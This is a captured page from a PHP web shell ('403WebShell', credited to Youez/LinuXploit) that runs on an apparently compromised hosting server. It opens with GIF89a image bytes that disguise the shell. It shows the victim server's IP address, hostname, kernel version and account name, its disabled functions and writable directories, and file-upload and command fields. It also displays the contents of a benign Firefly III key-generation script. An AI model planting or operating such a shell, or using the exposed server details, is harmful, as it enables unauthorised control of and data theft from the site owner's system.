GIF89a=( ý' 7IAXKgNgYvYx\%wh&h}týh%ýs%xý}9ýRýý&ý0%ý (ý.ýý5ýSDýý&ýa)ýx5ýý;c*!&r)ï7õ<{4ý3ýH§KoTýýYýaqýýqýýFý !ý ' !ý NETSCAPE2.0 , =( ýýpH,ý$rýl:x(tJýZý,výýzýýxL.:ýýzýnýýý|Nýýýýý~ýýýýýýý& !ý0`9Rý}ýý"ý"a:Sý~xýýýýýýýýgýýýEýýýýýýýRýýýEýýýýBýý ýý8ýýDýýý"ýný ýHýýLýýDkDýBýýýýýDýýýTýýýH ýGýýA Rý |ýý m&ýýE8ýSýkGýAýpxýaýýý R2XBýýE8Iýýý6Xý:vT)ý~ýýqýåýý"F~%xý ý 4#Zý0O|-4BsýX:= Qý SalýýyXJ`G&|s hýýK3l7ýB|ý$'7J©*0!ýýDýn=ýPý ýýýý0`ýRýljýýýýv>ýýý5 ý.69ýødýýýýýnlvý9ýýf{ýýýPbx ýl5}ýpý ýýý ý3aýýýIýOýýýý!>ýýýiýý9ýý#ýý)pýa ½ ý{ý)vmýý%D~ 6fýýs}RýDýW Eý`!ý ý&L8xý ý{)x`X/>ý}mýýRý*|`Dý=ý_ ^ý5 !_&'aýOý7ýcýý`DCx`ý¥ý9ýYýFýýý`?ýý"ý ýn@`ý} lýý@4>ýd S ývýxNýý"@~dýý=ýgýs~Gýýý ýýýud &p8Qý)«lXDýýýýA~HýySunýjýýýk*DýLHý] ýýC"JýýXb~ªwSt}6K,ýýqýS:9*:ýýýlý@ý`ýý ý.ìýt9ýSý[©:ýý=`9Nýýýý{¿ýA !Rý:ýýý6ýýxý0ý_ ý;ýýýýýý^ýýý#ýýýý!ýýýýUýýý;0L1ýýýýýp% AýýU,uýý%ýSýý!ýýý~`ýGýýýý ýýý=4ýnpý3ýýýýýýýýýuýuýn|%2ýIýýrý#0ýýJ``8ý@S@5ý ýýý^`8Eý]ý.ýSýýý7 ý ý0ýj SýDý zýýýiýSýýýýý!ýýýlýýw9*ýDýIýnEXýýý &AýGoýQfýýFýý;ýýý}ýJýýýýF5ýýQ|ýýýXýýTýýyýýý]ý o ýýC=ýý:ýýýPB@ DýSý(>ýCýx}`ýýxJ,ýàýýp+eE0`ý}`A ý/NEýý ý9@ýýý Hý7ý!%B0`ýl*ýý!8 2ý%ý ý:ý1ý0Eýýux%nP1ý!ýC)ýP81lýxF#¬{ýýýýB0>ýý 403WebShell
403Webshell
Server IP : 217.18.85.50  /  Your IP : 3.21.12.122
Web Server : LiteSpeed
System : Linux server50.tr85.dhs.com.tr 3.10.0-962.3.2.lve1.5.85.el7.x86_64 #1 SMP Thu Apr 18 15:18:36 UTC 2024 x86_64
User : ferhatgenc ( )
PHP Version : 7.2.34
Disable Function : restore_ini,mail,openbasedir,f_open,system,dl,array_compare,array_user_key_compare,passthru,cat,exec,popen,proc_close,proc_get_status,proc_nice,proc_open,escapeshellcmd,escapeshellarg,show_source,posix_mkfifo,ini_restore,mysql_list_dbs,getmyuid,pconnect,link,symlink,fin,passthruexec,fileread,shell_exec,pcntl_exec,ini_alter,leak,apache_child_terminate,chown,posix_kill,posix_setpgid,posix_setsid,posix_setuid,proc_terminate,syslog,allow_url_fopen,fpassthru,execute,shell,chgrp,passthru,socket_select,socket_create,socket_create_listen,socket_create_pair,socket_listen,socket_accept,socket_bind,foreach,socket_strerror,pcntl_fork,pcntl_signal,pcntl_waitpid,pcntl_wexitstatus,pcntl_wifexited,pcntl_wifsignaled,pcntl_wifstopped,pcntl_wstopsig,pcntl_wtermsig,openlog,apache_get_version,apache_getenv,apache_note,apache_setenv,virtualal
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/softaculous/firefly/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/softaculous/firefly/update_keys.php
<?php

global $key, $error;

$key = base64_decode('[[APP_KEY]]');

//Required to autoload the namespaces
require_once 'vendor/autoload.php';

use Ramsey\Uuid\Uuid;
use phpseclib3\Crypt\RSA;

$uuid5 = (string)Uuid::uuid5(Uuid::NAMESPACE_URL, 'firefly-iii.org');

//This is to generate public and private key pairs(of 4096 bits) using phpseclib's RSA class's createKey() function and store the keys in database

$keys = array();

$keys = RSA::createKey(4096);

$public_key = (string)$keys->getPublicKey();

$private_key = (string)$keys;

echo '<private_key>'.$private_key.'</private_key>';
echo '<public_key>'.$public_key.'</public_key>';

//Encrypting the keys
$uuid5_enc =  json_encode($uuid5);
$private_key_enc =  json_encode(__encrypt($private_key));
$public_key_enc =  json_encode(__encrypt($public_key));

echo '<installation_id>'.$uuid5_enc.'</installation_id>';
echo '<private_key_enc>'.$private_key_enc.'</private_key_enc>';
echo '<public_key_enc>'.$public_key_enc.'</public_key_enc>';

function __encrypt($value, $serialize = true)
{
	global $key, $error;
	$cipher = 'AES-256-CBC';
	//$this->cipher
	$iv = random_bytes(openssl_cipher_iv_length($cipher));

	// First we will encrypt the value using OpenSSL. After this is encrypted we
	// will proceed to calculating a MAC for the encrypted value so that this
	// value can be verified later as not having been changed by the users.
	$value = openssl_encrypt(
		$serialize ? serialize($value) : $value,
		$cipher, $key, 0, $iv
	);

	if ($value === false) {
		$error[] = 'Could not encrypt the data.';
	}

	// Once we get the encrypted value we'll go ahead and base64_encode the input
	// vector and create the MAC for the encrypted value so we can then verify
	// its authenticity. Then, we'll JSON the data into the "payload" array.
	$mac = __hash($iv = base64_encode($iv), $value);

	$json = json_encode(compact('iv', 'value', 'mac'));

	if (json_last_error() !== JSON_ERROR_NONE) {
		$error[] = 'Could not encrypt the data.';
	}

	return base64_encode($json);
}

function __hash($iv, $value)
{
	global $key;
	return hash_hmac('sha256', $iv.$value, $key);
}

@unlink('update_keys.php');

?>

Youez - 2016 - github.com/yon3zu
LinuXploit